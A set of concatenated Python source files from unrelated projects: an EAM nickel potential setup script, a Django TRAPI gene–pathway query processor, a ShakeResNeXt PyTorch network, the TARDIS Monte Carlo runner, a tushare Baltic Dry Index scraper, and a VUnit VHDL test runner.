Ni_eam_parameters['e_Ni_p'] = 8.96274624
Ni_eam_parameters['e_Ni_q'] = 8.95940869
Ni_eam_parameters['e_Ni_F1'] = -3.09
configuration = OrderedDict()
configuration['potential'] = Ni_eam_potential_definition
configuration['parameters'] = Ni_eam_parameters
#<------------- unpack dictionary
symbols = configuration['potential']['symbols']
func_pair = configuration['potential']['pair_type']
func_density = configuration['potential']['density_type']
func_embedding = configuration['potential']['embedding_type']
parameters = configuration['parameters']
#<------------ setup for testing
from pypospack.potential import EamPotential
eam = EamPotential(
symbols=symbols,
func_pair=func_pair,
func_density=func_density,
func_embedding=func_embedding)
a0 = 3.50803
sites = ['T','O','1NN','2NN','3NN']
N = OrderedDict()
N['T'] = 4
N['O'] = 4
N['1NN'] = 12
N['2NN'] = 6
N['3NN'] = 24
da = OrderedDict()
da['T'] = 0.433
da['O'] = 0.866
da['1NN']= 0.707
da['2NN']= 1.00
da['3NN'] = 1.225
rcut = 0.5 * (da['2NN'] + da['3NN'])
rho = OrderedDict()
for s in sites:
_pair = eam.evaluate_density(
r=a0*da[s],
parameters=parameters)
for p in _pair:
if p not in rho: rho[p] = OrderedDict()
rho[p][s] = _pair[p]
print(rho)
_pair = [p for p in rho]
for p in _pair:
for s in sites:
print("{s:^10}{N_s:^10}{da:^10.4f}{rho:^15.4e}{ttl_rho:^15.4e}".format(
s=s,
N_s=N[s],
da=da[s],
rho=rho[p][s],
ttl_rho=N[s]*rho[p][s]))
sites_lte_1NN = ['1NN']
rho_lte_1NN = 0.
filename = "Ni.eam.alloy"
Nr = configuration['potential']['N_r']
rmax = configuration['potential']['r_max']
rcut = configuration['potential']['r_cut']
Nrho = configuration['potential']['N_rho']
rhomax = configuration['potential']['rho_max']
eam.write_setfl_file(
filename=filename,
symbols=symbols,
Nr=Nr,
rmax=rmax,
rcut=rcut,
Nrho=Nrho,
rhomax=rhomax,
parameters=parameters)
assert os.path.isfile(filename)
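# Illustrative follow-up sketch (not part of the original script): a setfl file
# produced this way is typically consumed by LAMMPS through the eam/alloy pair
# style, e.g. in a LAMMPS input deck:
#
#   pair_style eam/alloy
#   pair_coeff * * Ni.eam.alloy Ni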
|
py | 7dfa1107c8990bf35bd842f176536ebc04668d79 | from sys import path
from django.http import response
from django.http.response import JsonResponse
from trapi_model import knowledge_graph
from trapi_model.query import Query
from trapi_model.biolink.constants import *
from trapi_model.knowledge_graph import KnowledgeGraph, KNode, KEdge
from .models import *
class QueryProcessor:
def __init__(self, query) -> None:
self.query = query
self.response = None
def build_response(self) -> None:
raise NotImplementedError
def get_response(self) -> JsonResponse:
raise NotImplementedError
    def extract_primary_key(self) -> str:
raise NotImplementedError
class PathwayToGeneWildcardQueryProcessor(QueryProcessor):
def __init__(self, query) -> None:
super().__init__(query)
self.pathway_nodes_id = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY])
self.pathway_nodes_id = list(self.pathway_nodes_id)[0]
pathway_node = query.message.query_graph.nodes.get(self.pathway_nodes_id)
self.pathway_curie = (pathway_node.ids[0])
#TODO: implement querying
self.response = 'dd'
def getResponse(self):
return JsonResponse(self.response, safe=False)
class GeneToPathwayWildcardQueryProcessor(QueryProcessor):
def __init__(self, query) -> None:
super().__init__(query)
self.gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY])
self.gene_nodes_ids = list(self.gene_nodes_ids)[0]
gene_node = query.message.query_graph.nodes.get(self.gene_nodes_ids)
self.gene_curie = (gene_node.ids[0])
self.pathways = GeneToPathway.objects.get(gene__exact=self.gene_curie).get_result()
print(self.pathways)
self.build_response()
def build_response(self) -> None:
knowledge_graph = KnowledgeGraph()
gene_count = 0
knowledge_graph.add_node(curie=self.gene_curie, categories="biolink:Gene", name=self.gene_curie)
for pathway in self.pathways:
gene_count = gene_count + 1
print(pathway)
knowledge_graph.add_node(curie=pathway, categories="biolink:Pathway", name=pathway)
knowledge_graph.add_edge(k_subject='n0', k_object="n{}".format(gene_count), predicate="biolink:participates_in")
self.response = knowledge_graph.to_dict()
def getResponse(self) -> JsonResponse:
return JsonResponse(self.response, safe=False)
class InvalidQueryProcessor(QueryProcessor):
def __init__(self,query) -> None:
super().__init__(query)
def getResponse(self):
return JsonResponse('invalid query type', safe=False)
class QueryIdentifier:
"""
    Identifies the type of query being passed so that the appropriate query processor may be applied to the query.
    :param request: the incoming request carrying the TRAPI query message
"""
@staticmethod
def getQueryProcessor(request) -> QueryProcessor:
def isGeneToPathwayWildcardQuery(query:Query)->bool:
"""
Identifies if a query is a gene to pathway query
"""
#check genes
pathway_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY])
gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY])
if pathway_nodes_ids is None:
return False
if gene_nodes_ids is None:
return False
if len(pathway_nodes_ids) != 1:
return False
if len(gene_nodes_ids) != 1:
return False
#check edge
edges = query.message.query_graph.edges
if len(edges) != 1:
return False
id = list(edges.keys())[0]
edge = edges.get(id)
#check predicate
predicates = edge.predicates
if len(predicates) != 1:
return False
predicate = predicates[0]
predicate = predicate.passed_name
if predicate != 'biolink:participates_in':
return False
#return True if all is swell
return True
def isPathwayToGeneWildcardQuery(query:Query)->bool:
"""
Identifies if a query is a pathway to gene query
"""
pathway_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY])
gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY])
if pathway_nodes_ids is None:
return False
if gene_nodes_ids is None:
return False
if len(pathway_nodes_ids) != 1:
return False
if len(gene_nodes_ids) != 1:
return False
#check edge
edges = query.message.query_graph.edges
if len(edges) != 1:
return False
id = list(edges.keys())[0]
edge = edges.get(id)
#check predicate
predicates = edge.predicates
if len(predicates) != 1:
return False
predicate = predicates[0]
predicate = predicate.passed_name
if predicate != 'biolink:has_participant':
return False
#return True if all is swell
return True
#Load in query from
query = Query.load('1.1', biolink_version=None, query=request.data, metakgValidation=False, semanticOperations=False)
query_processor = None
if isPathwayToGeneWildcardQuery(query):
query_processor = PathwayToGeneWildcardQueryProcessor(query)
elif isGeneToPathwayWildcardQuery(query):
query_processor = GeneToPathwayWildcardQueryProcessor(query)
else:
query_processor = InvalidQueryProcessor(query)
return query_processor
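# Illustrative wiring sketch (the view function and route are assumptions, not
# part of this module): a Django REST Framework view can delegate to
# QueryIdentifier and return the processor's response directly.
#
#   from rest_framework.decorators import api_view
#
#   @api_view(['POST'])
#   def query(request):
#       processor = QueryIdentifier.getQueryProcessor(request)
#       return processor.getResponse()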
|
py | 7dfa111e7e834676abfb3857f0c41d718433368f | # -*- coding: utf-8 -*-
import math
import torch.nn as nn
import torch.nn.functional as F
from .shakeshake import ShakeShake
from .shakeshake import Shortcut
class ShakeBottleNeck(nn.Module):
def __init__(self, in_ch, mid_ch, out_ch, cardinary, stride=1):
super(ShakeBottleNeck, self).__init__()
self.equal_io = in_ch == out_ch
self.shortcut = None if self.equal_io else Shortcut(in_ch, out_ch, stride=stride)
self.branch1 = self._make_branch(in_ch, mid_ch, out_ch, cardinary, stride)
self.branch2 = self._make_branch(in_ch, mid_ch, out_ch, cardinary, stride)
def forward(self, x):
h1 = self.branch1(x)
h2 = self.branch2(x)
h = ShakeShake.apply(h1, h2, self.training)
h0 = x if self.equal_io else self.shortcut(x)
return h + h0
def _make_branch(self, in_ch, mid_ch, out_ch, cardinary, stride=1):
return nn.Sequential(
nn.Conv2d(in_ch, mid_ch, 1, padding=0, bias=False),
nn.BatchNorm2d(mid_ch),
nn.ReLU(inplace=False),
nn.Conv2d(mid_ch, mid_ch, 3, padding=1, stride=stride, groups=cardinary, bias=False),
nn.BatchNorm2d(mid_ch),
nn.ReLU(inplace=False),
nn.Conv2d(mid_ch, out_ch, 1, padding=0, bias=False),
nn.BatchNorm2d(out_ch))
class ShakeResNeXt(nn.Module):
def __init__(self, depth, w_base, cardinary, label):
super(ShakeResNeXt, self).__init__()
n_units = (depth - 2) // 9
n_chs = [64, 128, 256, 1024]
self.n_chs = n_chs
self.in_ch = n_chs[0]
self.c_in = nn.Conv2d(3, n_chs[0], 3, padding=1)
self.layer1 = self._make_layer(n_units, n_chs[0], w_base, cardinary)
self.layer2 = self._make_layer(n_units, n_chs[1], w_base, cardinary, 2)
self.layer3 = self._make_layer(n_units, n_chs[2], w_base, cardinary, 2)
self.fc_out = nn.Linear(n_chs[3], label)
# Initialize paramters
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def forward(self, x):
h = self.c_in(x)
h = self.layer1(h)
h = self.layer2(h)
h = self.layer3(h)
h = F.relu(h)
h = F.avg_pool2d(h, 8)
h = h.view(-1, self.n_chs[3])
h = self.fc_out(h)
return h
def _make_layer(self, n_units, n_ch, w_base, cardinary, stride=1):
layers = []
mid_ch, out_ch = n_ch * (w_base // 64) * cardinary, n_ch * 4
for i in range(n_units):
layers.append(ShakeBottleNeck(self.in_ch, mid_ch, out_ch, cardinary, stride=stride))
self.in_ch, stride = out_ch, 1
return nn.Sequential(*layers)
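# Minimal usage sketch (not part of the original module; CIFAR-sized 32x32
# inputs are an assumption implied by the fixed 8x8 average pool in forward()):
#
#   import torch
#   model = ShakeResNeXt(depth=29, w_base=64, cardinary=4, label=10)
#   x = torch.randn(8, 3, 32, 32)
#   logits = model(x)   # -> torch.Size([8, 10])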
|
py | 7dfa116ca8f1645119be49297fe077082b8c3db7 | import os
import logging
import warnings
from astropy import units as u
from tardis import constants as const
from numba import set_num_threads
from scipy.special import zeta
from tardis.montecarlo.spectrum import TARDISSpectrum
from tardis.util.base import quantity_linspace
from tardis.io.util import HDFWriterMixin
from tardis.montecarlo import packet_source as source
from tardis.montecarlo.montecarlo_numba.formal_integral import FormalIntegrator
from tardis.montecarlo import montecarlo_configuration as mc_config_module
from tardis.montecarlo.montecarlo_numba import montecarlo_radial1d
from tardis.montecarlo.montecarlo_numba.numba_interface import (
configuration_initialize,
)
from tardis.montecarlo.montecarlo_numba import numba_config
from tardis.io.logger import montecarlo_tracking as mc_tracker
import numpy as np
logger = logging.getLogger(__name__)
MAX_SEED_VAL = 2 ** 32 - 1
# MAX_SEED_VAL must be multiple orders of magnitude larger than no_of_packets;
# otherwise, each packet would not have its own seed. Here, we set the max
# seed val to the maximum allowed by numpy.
# TODO: refactor this into more parts
class MontecarloRunner(HDFWriterMixin):
"""
This class is designed as an interface between the Python part and the
montecarlo C-part
"""
hdf_properties = [
"output_nu",
"output_energy",
"nu_bar_estimator",
"j_estimator",
"montecarlo_virtual_luminosity",
"last_interaction_in_nu",
"last_interaction_type",
"last_line_interaction_in_id",
"last_line_interaction_out_id",
"last_line_interaction_shell_id",
"packet_luminosity",
"spectrum",
"spectrum_virtual",
"spectrum_reabsorbed",
"time_of_simulation",
"emitted_packet_mask",
]
vpacket_hdf_properties = [
"virt_packet_nus",
"virt_packet_energies",
"virt_packet_initial_rs",
"virt_packet_initial_mus",
"virt_packet_last_interaction_in_nu",
"virt_packet_last_interaction_type",
"virt_packet_last_line_interaction_in_id",
"virt_packet_last_line_interaction_out_id",
]
hdf_name = "runner"
w_estimator_constant = (
(const.c ** 2 / (2 * const.h))
* (15 / np.pi ** 4)
* (const.h / const.k_B) ** 4
/ (4 * np.pi)
).cgs.value
t_rad_estimator_constant = (
(np.pi ** 4 / (15 * 24 * zeta(5, 1))) * (const.h / const.k_B)
).cgs.value
def __init__(
self,
seed,
spectrum_frequency,
virtual_spectrum_spawn_range,
disable_electron_scattering,
enable_reflective_inner_boundary,
enable_full_relativity,
inner_boundary_albedo,
line_interaction_type,
integrator_settings,
v_packet_settings,
spectrum_method,
virtual_packet_logging,
packet_source=None,
debug_packets=False,
logger_buffer=1,
single_packet_seed=None,
):
self.seed = seed
if packet_source is None:
self.packet_source = source.BlackBodySimpleSource(seed)
else:
self.packet_source = packet_source
# inject different packets
self.disable_electron_scattering = disable_electron_scattering
self.spectrum_frequency = spectrum_frequency
self.virtual_spectrum_spawn_range = virtual_spectrum_spawn_range
self.enable_reflective_inner_boundary = enable_reflective_inner_boundary
self.inner_boundary_albedo = inner_boundary_albedo
self.enable_full_relativity = enable_full_relativity
numba_config.ENABLE_FULL_RELATIVITY = enable_full_relativity
self.line_interaction_type = line_interaction_type
self.single_packet_seed = single_packet_seed
self.integrator_settings = integrator_settings
self.v_packet_settings = v_packet_settings
self.spectrum_method = spectrum_method
self.seed = seed
self._integrator = None
self._spectrum_integrated = None
self.virt_logging = virtual_packet_logging
self.virt_packet_last_interaction_type = np.ones(2) * -1
self.virt_packet_last_interaction_in_nu = np.ones(2) * -1.0
self.virt_packet_last_line_interaction_in_id = np.ones(2) * -1
self.virt_packet_last_line_interaction_out_id = np.ones(2) * -1
self.virt_packet_nus = np.ones(2) * -1.0
self.virt_packet_energies = np.ones(2) * -1.0
self.virt_packet_initial_rs = np.ones(2) * -1.0
self.virt_packet_initial_mus = np.ones(2) * -1.0
# set up logger based on config
mc_tracker.DEBUG_MODE = debug_packets
mc_tracker.BUFFER = logger_buffer
if self.spectrum_method == "integrated":
self.optional_hdf_properties.append("spectrum_integrated")
def _initialize_estimator_arrays(self, tau_sobolev_shape):
"""
Initialize the output arrays of the montecarlo simulation.
Parameters
----------
tau_sobolev_shape : tuple
tuple for the tau_sobolev_shape
"""
# Estimators
self.j_estimator = np.zeros(tau_sobolev_shape[1], dtype=np.float64)
self.nu_bar_estimator = np.zeros(tau_sobolev_shape[1], dtype=np.float64)
self.j_blue_estimator = np.zeros(tau_sobolev_shape)
self.Edotlu_estimator = np.zeros(tau_sobolev_shape)
# TODO: this is the wrong attribute naming style.
def _initialize_geometry_arrays(self, model):
"""
Generate the cgs like geometry arrays for the montecarlo part
Parameters
----------
model : model.Radial1DModel
"""
self.r_inner_cgs = model.r_inner.to("cm").value
self.r_outer_cgs = model.r_outer.to("cm").value
self.v_inner_cgs = model.v_inner.to("cm/s").value
def _initialize_packets(self, T, no_of_packets, iteration, radius):
# the iteration is added each time to preserve randomness
# across different simulations with the same temperature,
# for example. We seed the random module instead of the numpy module
# because we call random.sample, which references a different internal
# state than in the numpy.random module.
seed = self.seed + iteration
rng = np.random.default_rng(seed=seed)
seeds = rng.choice(MAX_SEED_VAL, no_of_packets, replace=True)
radii, nus, mus, energies = self.packet_source.create_packets(
T, no_of_packets, rng, radius
)
mc_config_module.packet_seeds = seeds
self.input_r = radii
self.input_nu = nus
self.input_mu = mus
self.input_energy = energies
self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0
self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0
self.last_line_interaction_in_id = -1 * np.ones(
no_of_packets, dtype=np.int64
)
self.last_line_interaction_out_id = -1 * np.ones(
no_of_packets, dtype=np.int64
)
self.last_line_interaction_shell_id = -1 * np.ones(
no_of_packets, dtype=np.int64
)
self.last_interaction_type = -1 * np.ones(no_of_packets, dtype=np.int64)
self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64)
self._montecarlo_virtual_luminosity = u.Quantity(
np.zeros_like(self.spectrum_frequency.value), "erg / s"
)
@property
def spectrum(self):
return TARDISSpectrum(
self.spectrum_frequency, self.montecarlo_emitted_luminosity
)
@property
def spectrum_reabsorbed(self):
return TARDISSpectrum(
self.spectrum_frequency, self.montecarlo_reabsorbed_luminosity
)
@property
def spectrum_virtual(self):
if np.all(self.montecarlo_virtual_luminosity == 0):
warnings.warn(
"MontecarloRunner.spectrum_virtual"
"is zero. Please run the montecarlo simulation with"
"no_of_virtual_packets > 0",
UserWarning,
)
return TARDISSpectrum(
self.spectrum_frequency, self.montecarlo_virtual_luminosity
)
@property
def spectrum_integrated(self):
if self._spectrum_integrated is None:
self._spectrum_integrated = self.integrator.calculate_spectrum(
self.spectrum_frequency[:-1], **self.integrator_settings
)
return self._spectrum_integrated
@property
def integrator(self):
if self._integrator is None:
warnings.warn(
"MontecarloRunner.integrator: "
"The FormalIntegrator is not yet available."
"Please run the montecarlo simulation at least once.",
UserWarning,
)
if self.enable_full_relativity:
raise NotImplementedError(
"The FormalIntegrator is not yet implemented for the full "
"relativity mode. "
"Please run with config option enable_full_relativity: "
"False."
)
return self._integrator
def run(
self,
model,
plasma,
no_of_packets,
no_of_virtual_packets=0,
nthreads=1,
last_run=False,
iteration=0,
total_iterations=0,
show_progress_bars=True,
):
"""
Run the montecarlo calculation
Parameters
----------
model : tardis.model.Radial1DModel
plasma : tardis.plasma.BasePlasma
no_of_packets : int
no_of_virtual_packets : int
nthreads : int
last_run : bool
total_iterations : int
The total number of iterations in the simulation.
Returns
-------
None
"""
set_num_threads(nthreads)
self.time_of_simulation = self.calculate_time_of_simulation(model)
self.volume = model.volume
# Initializing estimator array
self._initialize_estimator_arrays(plasma.tau_sobolevs.shape)
self._initialize_geometry_arrays(model)
self._initialize_packets(
model.t_inner.value, no_of_packets, iteration, model.r_inner[0]
)
configuration_initialize(self, no_of_virtual_packets)
montecarlo_radial1d(
model,
plasma,
iteration,
no_of_packets,
total_iterations,
show_progress_bars,
self,
)
self._integrator = FormalIntegrator(model, plasma, self)
# montecarlo.montecarlo_radial1d(
# model, plasma, self,
# virtual_packet_flag=no_of_virtual_packets,
# nthreads=nthreads,
# last_run=last_run)
def legacy_return(self):
return (
self.output_nu,
self.output_energy,
self.j_estimator,
self.nu_bar_estimator,
self.last_line_interaction_in_id,
self.last_line_interaction_out_id,
self.last_interaction_type,
self.last_line_interaction_shell_id,
)
def get_line_interaction_id(self, line_interaction_type):
return ["scatter", "downbranch", "macroatom"].index(
line_interaction_type
)
@property
def output_nu(self):
return u.Quantity(self._output_nu, u.Hz)
@property
def output_energy(self):
return u.Quantity(self._output_energy, u.erg)
@property
def virtual_packet_nu(self):
try:
return u.Quantity(self.virt_packet_nus, u.Hz)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_nu:"
"Set 'virtual_packet_logging: True' in the configuration file"
"to access this property"
"It should be added under 'virtual' property of 'spectrum' property",
UserWarning,
)
return None
@property
def virtual_packet_energy(self):
try:
return u.Quantity(self.virt_packet_energies, u.erg)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_energy:"
"Set 'virtual_packet_logging: True' in the configuration file"
"to access this property"
"It should be added under 'virtual' property of 'spectrum' property",
UserWarning,
)
return None
@property
def virtual_packet_luminosity(self):
try:
return self.virtual_packet_energy / self.time_of_simulation
except TypeError:
warnings.warn(
"MontecarloRunner.virtual_packet_luminosity:"
"Set 'virtual_packet_logging: True' in the configuration file"
"to access this property"
"It should be added under 'virtual' property of 'spectrum' property",
UserWarning,
)
return None
@property
def packet_luminosity(self):
return self.output_energy / self.time_of_simulation
@property
def emitted_packet_mask(self):
return self.output_energy >= 0
@property
def emitted_packet_nu(self):
return self.output_nu[self.emitted_packet_mask]
@property
def reabsorbed_packet_nu(self):
return self.output_nu[~self.emitted_packet_mask]
@property
def emitted_packet_luminosity(self):
return self.packet_luminosity[self.emitted_packet_mask]
@property
def reabsorbed_packet_luminosity(self):
return -self.packet_luminosity[~self.emitted_packet_mask]
@property
def montecarlo_reabsorbed_luminosity(self):
return u.Quantity(
np.histogram(
self.reabsorbed_packet_nu,
weights=self.reabsorbed_packet_luminosity,
bins=self.spectrum_frequency.value,
)[0],
"erg / s",
)
@property
def montecarlo_emitted_luminosity(self):
return u.Quantity(
np.histogram(
self.emitted_packet_nu,
weights=self.emitted_packet_luminosity,
bins=self.spectrum_frequency.value,
)[0],
"erg / s",
)
@property
def montecarlo_virtual_luminosity(self):
return (
self._montecarlo_virtual_luminosity[:-1]
/ self.time_of_simulation.value
)
def calculate_emitted_luminosity(
self, luminosity_nu_start, luminosity_nu_end
):
"""
Calculate emitted luminosity.
Parameters
----------
luminosity_nu_start : astropy.units.Quantity
luminosity_nu_end : astropy.units.Quantity
Returns
-------
astropy.units.Quantity
"""
luminosity_wavelength_filter = (
self.emitted_packet_nu > luminosity_nu_start
) & (self.emitted_packet_nu < luminosity_nu_end)
emitted_luminosity = self.emitted_packet_luminosity[
luminosity_wavelength_filter
].sum()
return emitted_luminosity
def calculate_reabsorbed_luminosity(
self, luminosity_nu_start, luminosity_nu_end
):
"""
Calculate reabsorbed luminosity.
Parameters
----------
luminosity_nu_start : astropy.units.Quantity
luminosity_nu_end : astropy.units.Quantity
Returns
-------
astropy.units.Quantity
"""
luminosity_wavelength_filter = (
self.reabsorbed_packet_nu > luminosity_nu_start
) & (self.reabsorbed_packet_nu < luminosity_nu_end)
reabsorbed_luminosity = self.reabsorbed_packet_luminosity[
luminosity_wavelength_filter
].sum()
return reabsorbed_luminosity
def calculate_radiationfield_properties(self):
"""
        Calculate an updated radiation field from the
        :math:`\\bar{\\nu}_\\textrm{estimator}` and :math:`J_\\textrm{estimator}`
        estimators calculated in the montecarlo simulation.
The details of the calculation can be found in the documentation.
Parameters
----------
nubar_estimator : np.ndarray (float)
j_estimator : np.ndarray (float)
Returns
-------
t_rad : astropy.units.Quantity (float)
w : numpy.ndarray (float)
"""
t_rad = (
self.t_rad_estimator_constant
* self.nu_bar_estimator
/ self.j_estimator
)
w = self.j_estimator / (
4
* const.sigma_sb.cgs.value
* t_rad ** 4
* self.time_of_simulation.value
* self.volume.value
)
return t_rad * u.K, w
def calculate_luminosity_inner(self, model):
"""
Calculate inner luminosity.
Parameters
----------
model : model.Radial1DModel
Returns
-------
astropy.units.Quantity
"""
return (
4
* np.pi
* const.sigma_sb.cgs
* model.r_inner[0] ** 2
* model.t_inner ** 4
).to("erg/s")
def calculate_time_of_simulation(self, model):
"""
Calculate time of montecarlo simulation.
Parameters
----------
model : model.Radial1DModel
Returns
-------
float
"""
return 1.0 * u.erg / self.calculate_luminosity_inner(model)
def calculate_f_nu(self, frequency):
pass
def calculate_f_lambda(self, wavelength):
pass
@classmethod
def from_config(
cls, config, packet_source=None, virtual_packet_logging=False
):
"""
Create a new MontecarloRunner instance from a Configuration object.
Parameters
----------
config : tardis.io.config_reader.Configuration
virtual_packet_logging : bool
Returns
-------
MontecarloRunner
"""
if config.plasma.disable_electron_scattering:
logger.warn(
"Disabling electron scattering - this is not physical."
"Likely bug in formal integral - "
"will not give same results."
)
numba_config.SIGMA_THOMSON = 1e-200
# mc_config_module.disable_electron_scattering = True
else:
logger.debug("Electron scattering switched on")
numba_config.SIGMA_THOMSON = const.sigma_T.to("cm^2").value
# mc_config_module.disable_electron_scattering = False
spectrum_frequency = quantity_linspace(
config.spectrum.stop.to("Hz", u.spectral()),
config.spectrum.start.to("Hz", u.spectral()),
num=config.spectrum.num + 1,
)
mc_config_module.disable_line_scattering = (
config.plasma.disable_line_scattering
)
return cls(
seed=config.montecarlo.seed,
spectrum_frequency=spectrum_frequency,
virtual_spectrum_spawn_range=config.montecarlo.virtual_spectrum_spawn_range,
enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary,
inner_boundary_albedo=config.montecarlo.inner_boundary_albedo,
enable_full_relativity=config.montecarlo.enable_full_relativity,
line_interaction_type=config.plasma.line_interaction_type,
integrator_settings=config.spectrum.integrated,
v_packet_settings=config.spectrum.virtual,
spectrum_method=config.spectrum.method,
disable_electron_scattering=config.plasma.disable_electron_scattering,
packet_source=packet_source,
debug_packets=config.montecarlo.debug_packets,
logger_buffer=config.montecarlo.logger_buffer,
single_packet_seed=config.montecarlo.single_packet_seed,
virtual_packet_logging=(
config.spectrum.virtual.virtual_packet_logging
| virtual_packet_logging
),
)
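# Illustrative usage sketch (not part of the original module; the config, model
# and plasma objects are assumed to come from the usual TARDIS entry points):
#
#   runner = MontecarloRunner.from_config(config)
#   runner.run(model, plasma, no_of_packets=40000, iteration=0)
#   emitted = runner.spectrum           # TARDISSpectrum of emitted packets
#   t_rad, w = runner.calculate_radiationfield_properties()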
|
py | 7dfa11d01d70e0b2de4387e4d89056a691e8a706 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Dragon and Tiger List (daily top list) data
Created on 2017-08-13
@author: Jimmy Liu
@group : waditu
@contact: [email protected]
"""
import pandas as pd
from io import StringIO
from tushare.stock import cons as ct
import time
import re
import lxml.html
from lxml import etree
try:
from urllib.request import urlopen, Request
except ImportError:
from urllib2 import urlopen, Request
def bdi(itype='D', retry_count=3,
pause=0.001):
for _ in range(retry_count):
time.sleep(pause)
try:
request = Request(ct.BDI_URL%(ct.P_TYPE['http'], ct.DOMAINS['v500']))
lines = urlopen(request, timeout = 10).read()
if len(lines) < 100: #no data
return None
except Exception as e:
print(e)
else:
linestr = lines.decode('utf-8') if ct.PY3 else lines
if itype == 'D': # Daily
reg = re.compile(r'\"chart_data\",\"(.*?)\"\);')
lines = reg.findall(linestr)
lines = lines[0]
lines = lines.replace('chart', 'table').\
replace('</series><graphs>', '').\
replace('</graphs>', '').\
replace('series', 'tr').\
replace('value', 'td').\
replace('graph', 'tr').\
replace('graphs', 'td')
df = pd.read_html(lines, encoding='utf8')[0]
df = df.T
df.columns = ['date', 'index']
df['date'] = df['date'].map(lambda x: x.replace(u'年', '-')).\
map(lambda x: x.replace(u'月', '-')).\
map(lambda x: x.replace(u'日', ''))
df['date'] = pd.to_datetime(df['date'])
df['index'] = df['index'].astype(float)
df = df.sort_values('date', ascending=False).reset_index(drop = True)
df['change'] = df['index'].pct_change(-1)
df['change'] = df['change'] * 100
df['change'] = df['change'].map(lambda x: '%.2f' % x)
df['change'] = df['change'].astype(float)
return df
else: #Weekly
html = lxml.html.parse(StringIO(linestr))
res = html.xpath("//table[@class=\"style33\"]/tr/td/table[last()]")
if ct.PY3:
sarr = [etree.tostring(node).decode('utf-8') for node in res]
else:
sarr = [etree.tostring(node) for node in res]
sarr = ''.join(sarr)
sarr = '<table>%s</table>'%sarr
df = pd.read_html(sarr)[0][1:]
df.columns = ['month', 'index']
df['month'] = df['month'].map(lambda x: x.replace(u'年', '-')).\
map(lambda x: x.replace(u'月', ''))
df['month'] = pd.to_datetime(df['month'])
df['month'] = df['month'].map(lambda x: str(x).replace('-', '')).\
map(lambda x: x[:6])
df['index'] = df['index'].astype(float)
df['change'] = df['index'].pct_change(-1)
df['change'] = df['change'].map(lambda x: '%.2f' % x)
df['change'] = df['change'].astype(float)
return df
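# Illustrative usage sketch (not part of the original module):
#
#   df_daily = bdi('D')   # daily series: columns date, index, change (%)
#   df_other = bdi('W')   # any itype other than 'D' returns the aggregated
#                         # table parsed from the HTML page (month, index, change)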
|
py | 7dfa123e114d54bfeae0745e7534548b7ceb0751 | #!/usr/bin/env python3
from pathlib import Path
from vunit import VUnit
# ROOT
ROOT = Path(__file__).resolve().parent
VU = VUnit.from_argv()
mathlib = VU.add_library("math_library")
mathlib.add_source_files(ROOT / "../math_library/multiplier/multiplier_base_types_22bit_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/multiplier/multiplier_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/sincos/sincos_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/pi_controller/pi_controller_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/abc_to_ab_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/ab_to_abc_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/dq_to_ab_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "../math_library/multiplier/simulation/tb_multiplier.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/abc_to_ab_transform/abc_to_ab_transform_simulation/tb_abc_to_ab_transform.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_simulation/tb_ab_to_dq_transforms.vhd")
mathlib.add_source_files(ROOT / "state_variable/state_variable_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/pmsm_electrical_model_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/pmsm_mechanical_model_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/permanent_magnet_motor_model_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/field_oriented_motor_control/field_oriented_motor_control_pkg.vhd")
mathlib.add_source_files(ROOT / "lcr_filter_model/lcr_filter_model_pkg.vhd")
mathlib.add_source_files(ROOT / "lcr_filter_model/lcr_filter_simulation/tb_lcr_filter.vhd")
mathlib.add_source_files(ROOT / "../math_library/coordinate_transforms/ab_to_dq_transform/ab_to_dq_transform_pkg.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/simulate_permanent_magnet_synchronous_machine/tb_permanent_magnet_synchronous_machine_model.vhd")
mathlib.add_source_files(ROOT / "ac_motor_models/field_oriented_motor_control/field_oriented_motor_control_simulation/tb_field_oriented_motor_control.vhd")
mathlib.add_source_files(ROOT / "inverter_model/inverter_model_pkg.vhd")
mathlib.add_source_files(ROOT / "inverter_model/inverter_model_simulation/tb_inverter_model.vhd")
mathlib.add_source_files(ROOT / "power_supply_model/power_supply_simulation_model_pkg.vhd")
mathlib.add_source_files(ROOT / "power_supply_model/psu_inverter_simulation_models_pkg.vhd")
mathlib.add_source_files(ROOT / "power_supply_model/power_supply_model_simulation/tb_power_supply_model.vhd")
mathlib.add_source_files(ROOT / "state_variable/simulation/tb_state_variable.vhd")
VU.main()
